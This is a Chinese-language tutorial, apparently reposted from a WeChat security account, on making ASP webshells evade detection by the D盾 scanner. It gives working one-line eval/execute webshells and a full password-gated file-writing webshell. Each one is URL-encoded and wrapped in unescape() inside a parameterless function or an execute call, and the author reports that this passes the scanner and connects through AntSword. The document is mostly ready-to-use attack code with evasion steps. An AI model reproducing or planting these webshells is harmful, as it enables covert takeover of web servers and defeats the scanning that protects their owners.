正文
第一步,确定免杀目标
比如普通的asp一句话就是
<% eval(request("mr6"))%>
或者
<% execute request("mr6") %>
也就是说你的shell在一系列操作之后要达到这种效果
因为eval execute在asp中类似一种语言结构,除了大小写之外不能对其进行变化
所以我们混淆的重点主要是后面的request("mr6")参数
第二步,打开语法手册
百度搜一个asp语法手册
https://www.w3school.com.cn/vbscript/vbscript_ref_functions.asp
查找到字符串有关的函数,随便选一个
他这里只是显示了一部分,我就拿unescape来举例子
第三步,混淆
unescape在asp中相当于php的urldecode,就是url编码
所以先把payload给编码一遍
为了增强混淆的效果,所以采用burp的decoder模块,因为burp是对所有字符进行编码。
扫一下,发现四级
提示eval参数xxxx
那么我们定义个函数传进去呢
发现已经降到了一级
但是我们的目标是做到0级
继续分析一下查杀的原因是参数test(xxxx)
随便改一下参数内容试一下
当我们传入123456时还是报一级,说明这时D盾查杀的只是调用,而跟你传什么东西没有关系
把参数删掉试试
此时D盾就不再提示了
所以我们只需要构造一个无参数函数即可
<%
Function test():
dim aaa
aaa="%65%76%61%6c%28%72%65%71%75%65%73%74%28%22%6d%72%36%22%29%29"
test = unescape(aaa)
End Function
eval(test())
%>成功bypass D盾
使用蚁剑成功连接
原理都是一样的,一个函数被杀了就换一个函数
反思拓展
既然我们可以把任意的payload编码一下然后eval,那么我们是否可以用同样的办法实现对任意文件免杀?
答案当然是可以的
但是我们前提是要说明一点区别
eval与execute
Eval 计算一个表达式的值并返回结果
语法:[result = ]Eval(expression)
expression 为任意有效 VBScript 表达式的字符串
示例:response.Write(eval("3+2")) '输出 5
"3+2" 使用引号括起来,表示是一个字符串,但是在 Eval “眼里”,把它当作一个表达式 3+2 来执行。
Execute 执行一个或多个指定的语句。多个语句间用冒号(:)隔开
语法:Execute statements
示例:Execute "response.Write(""abc"")" '输出 abc
"response.Write(""abc"")" 使用引号括起来,表示是一个字符串,但是在 Execute “眼里”,把它当作一个语句 response.Write("abc") 来执行。
也就是说对于小编来说只有一句话,所以两者用哪个都可以
但是大是多句,就不能用eval来执行了,而要用execute
实现任意文件免杀
首先随便找个大编
```<%on error resume next%><%if request("pass")="g" then '在这修改密码session("pw")="go"end if%><%if session("pw")<>"go" then %><%="<center><br><form action='' method='post'>"%><%="<input name='pass' type='password' size='10'> <input "%><%="type='submit' value='test'></center>"%><%else%><%set fso=server.createobject("scripting.filesystemobject")path=request("path")if path<>"" thendata=request("da")set da=fso.createtextfile(path,true)da.write dataif err=0 then%><%="yes"%><%else%><%="no"%><%end iferr.clearend ifda.close%><%set da=nothing%><%set fos=nothing%><%="<form action='' method=post>"%><%="<input type=text name=path>"%><%="<br>"%><%="当前文件路径:"&server.mappath(request.servervariables("script_name"))%><%="<br>"%><%="操作系统为:"&Request.ServerVariables("OS")%><%="<br>"%><%="WEB服务器版本为:"&Request.ServerVariables("SERVER_SOFTWARE")%><%="<br>"%><%="服务器的IP为:"&Request.ServerVariables("LOCAL_ADDR")%><%="<br>"%><%=""%><%="<textarea name=da cols=50 rows=10 width=30></textarea>"%><%="<br>"%><%="<input type=submit value=save>"%><%="</form>"%><%end if%>
因为只是举例子就找一个具有文件保存的大马
扫一下不出意外的被杀
### 代码处理
首先把多余的标签给去掉,只留下中间的代码
**如果采用url编码的话一定要去掉里面所有的中文!**
**否则会一直报未结束的字符串常量错误**
```on error resume nextif request("pass")="g" thensession("pw")="go"end ifif session("pw")<>"go" thenresponse.write("<center><br><form action='' method='post'>")response.write("<input name='pass' type='password' size='10'> <input ")response.write("type='submit' value='test'></center>")elseset fso=server.createobject("scripting.filesystemobject")path=request("path")if path<>"" thendata=request("da")set da=fso.createtextfile(path,true)da.write dataif err=0 thenresponse.write("yes")elseresponse.write("no")end iferr.clearend ifda.closeset da=nothingset fos=nothingresponse.write("<form action='' method=post>")response.write("<input type=text name=path>")response.write("<br>")response.write("path:"&server.mappath(request.servervariables("script_name")))response.write("<br>")response.write("os:"&Request.ServerVariables("OS"))response.write("<br>")response.write("WEB:"&Request.ServerVariables("SERVER_SOFTWARE"))response.write("<br>")response.write("IP:"&Request.ServerVariables("LOCAL_ADDR"))response.write("<br>")response.write("")response.write("<textarea name=da cols=50 rows=10 width=30></textarea>")response.write("<br>")response.write("<input type=submit value=save>")response.write("</form>")end if```
然后扔到burp里进行url编码
然后外层包裹上执行代码
```
<%execute (unescape("%6f%6e%20%65%72%72%6f%72%20%72%65%73%75%6d%65%20%6e%65%78%74%0a%20%20%69%66%20%72%65%71%75%65%73%74%28%22%70%61%73%73%22%29%3d%22%67%22%20%74%68%65%6e%0a%20%20%73%65%73%73%69%6f%6e%28%22%70%77%22%29%3d%22%67%6f%22%0a%20%20%65%6e%64%20%69%66%0a%69%66%20%73%65%73%73%69%6f%6e%28%22%70%77%22%29%3c%3e%22%67%6f%22%20%74%68%65%6e%20%0a%72%65%73%70%6f%6e%73%65%2e%77%72%69%74%65%28%22%3c%63%65%6e%74%65%72%3e%3c%62%72%3e%3c%66%6f%72%6d%20%61%63%74%69%6f%6e%3d%27%27%20%6d%65%74%68%6f%64%3d%27%70%6f%73%74%27%3e%22%29%0a%72%65%73%70%6f%6e%73%65%2e%77%72%69%74%65%28%22%3c%69%6e%70%75%74%20%6e%61%6d%65%3d%27%70%61%73%73%27%20%74%79%70%65%3d%27%70%61%73%73%77%6f%72%64%27%20%73%69%7a%65%3d%27%31%30%27%3e%20%3c%69%6e%70%75%74%20%22%29%0a%72%65%73%70%6f%6e%73%65%2e%77%72%69%74%65%28%22%74%79%70%65%3d%27%73%75%62%6d%69%74%27%20%76%61%6c%75%65%3d%27%31%32%33%27%3e%3c%2f%63%65%6e%74%65%72%3e%22%29%0a%65%6c%73%65%0a%0a%73%65%74%20%66%73%6f%3d%73%65%72%76%65%72%2e%63%72%65%61%74%65%6f%62%6a%65%63%74%28%22%73%63%72%69%70%74%69%6e%67%2e%66%69%6c%65%73%79%73%74%65%6d%6f%62%6a%65%63%74%22%29%0a%70%61%74%68%3d%72%65%71%75%65%73%74%28%22%70%61%74%68%22%29%0a%69%66%20%70%61%74%68%3c%3e%22%22%20%74%68%65%6e%0a%64%61%74%61%3d%72%65%71%75%65%73%74%28%22%64%61%22%29%0a%73%65%74%20%64%61%3d%66%73%6f%2e%63%72%65%61%74%65%74%65%78%74%66%69%6c%65%28%70%61%74%68%2c%74%72%75%65%29%0a%64%61%2e%77%72%69%74%65%20%64%61%74%61%0a%69%66%20%65%72%72%3d%30%20%74%68%65%6e%0a%72%65%73%70%6f%6e%73%65%2e%77%72%69%74%65%28%22%79%65%73%22%29%0a%65%6c%73%65%0a%72%65%73%70%6f%6e%73%65%2e%77%72%69%74%65%28%22%6e%6f%22%29%0a%65%6e%64%20%69%66%0a%65%72%72%2e%63%6c%65%61%72%0a%65%6e%64%20%69%66%0a%64%61%2e%63%6c%6f%73%65%0a%73%65%74%20%64%61%3d%6e%6f%74%68%69%6e%67%0a%73%65%74%20%66%6f%73%3d%6e%6f%74%68%69%6e%67%0a%72%65%73%70%6f%6e%73%65%2e%77%72%69%74%65%28%22%3c%66%6f%72%6d%20%61%63%74%69%6f%6e%3d%27%27%20%6d%65%74%68%6f%64%3d%70%6f%73%74%3e%22%29%0a%72%65%73%70%6f%6e%73%65%2e%77%72%69%74%65%28%22%3c%69%6e%70%75%74%20%74%79%70%65%3d%74%65%78%74%20%6e%61%6d%65%3d%70%61%74%68%3e%22%29%0a%72%65%73%70%6f%6e%73%65%2e%77%72%69%74%65%28%22%3c%62%72%3e%22%29%0a%72%65%73%70%6f%6e%73%65%2e%77%72%69%74%65%28%22%70%61%74%68%3a%22%26%73%65%72%76%65%72%2e%6d%61%70%70%61%74%68%28%72%65%71%75%65%73%74%2e%73%65%72%76%65%72%76%61%72%69%61%62%6c%65%73%28%22%73%63%72%69%70%74%5f%6e%61%6d%65%22%29%29%29%0a%72%65%73%70%6f%6e%73%65%2e%77%72%69%74%65%28%22%3c%62%72%3e%22%29%0a%72%65%73%70%6f%6e%73%65%2e%77%72%69%74%65%28%22%6f%73%3a%22%26%52%65%71%75%65%73%74%2e%53%65%72%76%65%72%56%61%72%69%61%62%6c%65%73%28%22%4f%53%22%29%29%0a%72%65%73%70%6f%6e%73%65%2e%77%72%69%74%65%28%22%3c%62%72%3e%22%29%0a%72%65%73%70%6f%6e%73%65%2e%77%72%69%74%65%28%22%57%45%42%3a%22%26%52%65%71%75%65%73%74%2e%53%65%72%76%65%72%56%61%72%69%61%62%6c%65%73%28%22%53%45%52%56%45%52%5f%53%4f%46%54%57%41%52%45%22%29%29%0a%72%65%73%70%6f%6e%73%65%2e%77%72%69%74%65%28%22%3c%62%72%3e%22%29%0a%72%65%73%70%6f%6e%73%65%2e%77%72%69%74%65%28%22%49%50%3a%22%26%52%65%71%75%65%73%74%2e%53%65%72%76%65%72%56%61%72%69%61%62%6c%65%73%28%22%4c%4f%43%41%4c%5f%41%44%44%52%22%29%29%0a%72%65%73%70%6f%6e%73%65%2e%77%72%69%74%65%28%22%3c%62%72%3e%22%29%0a%72%65%73%70%6f%6e%73%65%2e%77%72%69%74%65%28%22%22%29%0a%72%65%73%70%6f%6e%73%65%2e%77%72%69%74%65%28%22%3c%74%65%78%74%61%72%65%61%20%6e%61%6d%65%3d%64%61%20%63%6f%6c%73%3d%35%30%20%72%6f%77%73%3d%31%30%20%77%69%64%74%68%3d%33%30%3e%3c%2f%74%65%78%74%61%72%65%61%3e%22%29%0a%72%65%73%70%6f%6e%73%65%2e%77%72%69%74%65%28%22%3c%62%72%3e%22%29%0a%72%65%73%70%6f%6e%73%65%2e%77%72%69%74%65%28%22%3c%69%6e%70%75%74%20%74%79%70%65%3d%73%75%62%6d%69%74%20%76%61%6c%75%65%3d%73%61%76%65%3e%22%29%0a%72%65%73%70%6f%6e%73%65%2e%77%72%69%74%65%28%22%3c%2f%66%6f%72%6d%3e%22%29%0a%65%6e%64%20%69%66"))%>```
先试一下能不能运行
保存个文件试试
保存成功
用D盾扫一扫,直接就bypass了。。。
看来D盾对于超长字符串参数也是不敏感。
最后
套路都是差不多的自己多动手想一想你肯定能做的比我更好。
本文始发于微信公众号(疯猫网络):webshell免杀从入门到放弃之ASP
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论